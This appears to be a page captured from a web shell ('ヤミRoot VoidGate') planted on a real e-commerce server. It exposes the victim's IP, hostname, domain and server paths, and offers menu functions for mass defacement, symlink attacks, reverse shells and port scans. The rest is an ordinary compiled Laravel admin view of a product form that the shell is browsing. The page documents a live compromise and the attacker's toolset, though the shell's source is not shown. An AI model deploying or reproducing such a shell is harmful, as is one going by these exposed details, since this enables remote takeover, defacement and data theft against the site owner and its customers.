ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: 539b0067876ae03f04c97b506c779bee.php
<div class="general_wrapper mt-3"> <div class="outline-wrapper"> <div class="card rest-part bg-animate"> <div class="card-header d-flex justify-content-between align-items-center pc-header-ai-btn "> <div class="d-flex align-items-center gap-2"> <i class="fi fi-sr-user"></i> <h3 class="mb-0"><?php echo e(translate('general_setup')); ?></h3> </div> <button type="button" class="btn bg-white text-primary bg-transparent shadow-none border-0 opacity-1 generate_btn_wrapper p-0 general_setup_auto_fill" id="general_setup_auto_fill" data-route="<?php echo e(route('admin.product.general-setup-auto-fill')); ?>" data-item="" data-lang="en"> <div class="btn-svg-wrapper"> <img width="18" height="18" class="" src="<?php echo e(dynamicAsset(path: 'public/assets//back-end/img/ai/blink-right-small.svg')); ?>" alt=""> </div> <span class="ai-text-animation d-none" role="status"> <?php echo e(translate('Just_a_second')); ?> </span> <span class="btn-text"><?php echo e(translate('Generate')); ?></span> </button> </div> <div class="card-body"> <div class="row gy-4"> <div class="col-md-6 col-lg-4 col-xl-3"> <div class="form-group"> <label class="form-label"> <?php echo e(translate('product_type')); ?> <span class="input-required-icon">*</span> </label> <div class="select-wrapper"> <select name="product_type" id="product_type" class="form-select" data-required-msg="<?php echo e(translate('product_type_is_required')); ?>" required> <option value="physical" <?php echo e($product->product_type == 'physical' ? 'selected' : ''); ?>> <?php echo e(translate('physical')); ?> </option> <?php if($digitalProductSetting): ?> <option value="digital" <?php echo e($product->product_type == 'digital' ? 'selected' : ''); ?>> <?php echo e(translate('digital')); ?> </option> <?php endif; ?> </select> </div> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3"> <div class="form-group"> <label for="name" class="form-label"> <?php echo e(translate('category')); ?> <span class="input-required-icon">*</span> </label> <select class="custom-select action-get-request-onchange" name="category_id" id="category_id" data-url-prefix="<?php echo e(url('/admin/products/get-categories?parent_id=')); ?>" data-element-id="sub-category-select" data-element-type="select" data-placeholder="<?php echo e(translate('select_category')); ?>" data-required-msg="<?php echo e(translate('Category_field_is_required')); ?>" required required> <option value="<?php echo e(old('category_id')); ?>" selected disabled> <?php echo e(translate('select_category')); ?> </option> <?php $__currentLoopData = $categories; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $category): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($category['id']); ?>" <?php echo e($category->id == $product['category_id'] ? 'selected' : ''); ?>> <?php echo e($category['defaultName']); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3"> <div class="form-group"> <label for="name" class="form-label"><?php echo e(translate('sub_Category')); ?></label> <select class="custom-select action-get-request-onchange" name="sub_category_id" id="sub-category-select" data-id="<?php echo e($product['sub_category_id']); ?>" data-url-prefix="<?php echo e(url('/admin/products/get-categories?parent_id=')); ?>" data-element-id="sub-sub-category-select" data-element-type="select" data-placeholder="<?php echo e(translate('select_Sub_Category')); ?>"> </select> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3"> <div class="form-group"> <label for="name" class="form-label"><?php echo e(translate('sub_Sub_Category')); ?></label> <select class="custom-select" name="sub_sub_category_id" id="sub-sub-category-select" data-id="<?php echo e($product['sub_sub_category_id']); ?>" data-placeholder="<?php echo e(translate('select_Sub_Sub_Category')); ?>" > </select> </div> </div> <?php if($brandSetting): ?> <div class="col-md-6 col-lg-4 col-xl-3 show-for-physical-product"> <div class="form-group"> <label class="form-label"> <?php echo e(translate('brand')); ?> </label> <select class="custom-select" name="brand_id" id="brand_id"> <option value="<?php echo e(null); ?>" selected disabled> <?php echo e(translate('select_Brand')); ?> </option> <option value="<?php echo e(null); ?>"> <?php echo e(translate('No_Brand')); ?> </option> <?php $__currentLoopData = $brands; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $brand): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($brand['id']); ?>" <?php echo e($brand['id'] == $product->brand_id ? 'selected' : ''); ?>> <?php echo e($brand['defaultName']); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <?php endif; ?> <div class="col-md-6 col-lg-4 col-xl-3 show-for-digital-product"> <div class="form-group"> <label class="form-label"> <?php echo e(translate("Author")); ?>/<?php echo e(translate("Creator")); ?>/<?php echo e(translate("Artist")); ?> </label> <select class="custom-select tags" name="authors[]" multiple="multiple" id="mySelect"> <?php $__currentLoopData = $digitalProductAuthors; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $authors): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($authors['name']); ?>" <?php echo e(in_array($authors['id'], $productAuthorIds) ? 'selected' : ''); ?>> <?php echo e($authors['name']); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3 show-for-digital-product"> <div class="form-group"> <label class="form-label"><?php echo e(translate("Publishing_House")); ?></label> <select class="custom-select tags" name="publishing_house[]" multiple="multiple"> <?php $__currentLoopData = $publishingHouseList; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $publishingHouse): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($publishingHouse['name']); ?>" <?php echo e(in_array($publishingHouse['id'], $productPublishingHouseIds) ? 'selected' : ''); ?>> <?php echo e($publishingHouse['name']); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3 show-for-digital-product"> <div class="form-group"> <label for="digital-product-type-input" class="form-label"> <?php echo e(translate("delivery_type")); ?> <span class="input-required-icon">*</span> <span class="tooltip-icon cursor-pointer" data-bs-toggle="tooltip" aria-label="<?php echo e(translate('for_Ready_Product_deliveries,_customers_can_pay_&_instantly_download_pre-uploaded_digital_products').' '. translate('For_Ready_After_Sale_deliveries,_customers_pay_first_then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download')); ?>" data-bs-title="<?php echo e(translate('for_Ready_Product_deliveries,_customers_can_pay_&_instantly_download_pre-uploaded_digital_products').' '. translate('For_Ready_After_Sale_deliveries,_customers_pay_first_then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download')); ?>"> <i class="fi fi-sr-info"></i> </span> </label> <div class="select-wrapper"> <select name="digital_product_type" id="digital-product-type-input" class="form-select" > <option value="ready_after_sell" <?php echo e($product->digital_product_type == 'ready_after_sell' ? 'selected' : ''); ?>> <?php echo e(translate("ready_After_Sell")); ?> </option> <option value="ready_product" <?php echo e($product->digital_product_type == 'ready_product' ? 'selected' : ''); ?>> <?php echo e(translate("ready_Product")); ?> </option> </select> </div> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3"> <div class="form-group"> <label class="form-label d-flex justify-content-between gap-2"> <span class="d-flex align-items-center gap-2"> <?php echo e(translate('product_SKU')); ?> <span class="input-required-icon">*</span> <span class="tooltip-icon cursor-pointer" data-bs-toggle="tooltip" aria-label="<?php echo e(translate('create_a_unique_product_code_by_clicking_on_the_Generate_Code_button')); ?>" data-bs-title="<?php echo e(translate('create_a_unique_product_code_by_clicking_on_the_Generate_Code_button')); ?>"> <i class="fi fi-sr-info"></i> </span> </span> <span class="style-one-pro cursor-pointer user-select-none text-primary action-onclick-generate-number" data-input="#generate-sku-code"> <?php echo e(translate('generate_code')); ?> </span> </label> <input type="text" minlength="6" id="generate-sku-code" name="code" class="form-control" value="<?php echo e(request('product-gallery') ? ' ' : $product->code); ?>" data-required-msg="<?php echo e(translate('sku_code_is_required')); ?>" placeholder="<?php echo e(translate('ex'). ': YU62TN'); ?>" required> </div> </div> <div class="col-md-6 col-lg-4 col-xl-3 show-for-physical-product"> <div class="form-group"> <label class="form-label"> <?php echo e(translate('unit')); ?> <span class="input-required-icon">*</span> </label> <div class="select-wrapper"> <select class="form-select" name="unit"> <?php $__currentLoopData = units(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $unit): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value=<?php echo e($unit); ?> <?php echo e($product->unit == $unit ? 'selected' : ''); ?>> <?php echo e($unit); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> </div> <div class="col-md-9"> <div class="form-group"> <label class="form-label d-flex align-items-center gap-2"> <?php echo e(translate('search_tags')); ?> <span class="tooltip-icon cursor-pointer" data-bs-toggle="tooltip" aria-label="<?php echo e(translate('add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly')); ?>" data-bs-title="<?php echo e(translate('add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly')); ?>"> <i class="fi fi-sr-info"></i> </span> </label> <input type="text" class="form-control" name="tags" id="tags" placeholder="<?php echo e(translate('enter_tag')); ?>" value="<?php $__currentLoopData = $product->tags; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $c): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php echo e($c->tag.','); ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>" data-role="tagsinput"> </div> </div> </div> </div> </div> </div> </div> <?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/product/update/_general-setup.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick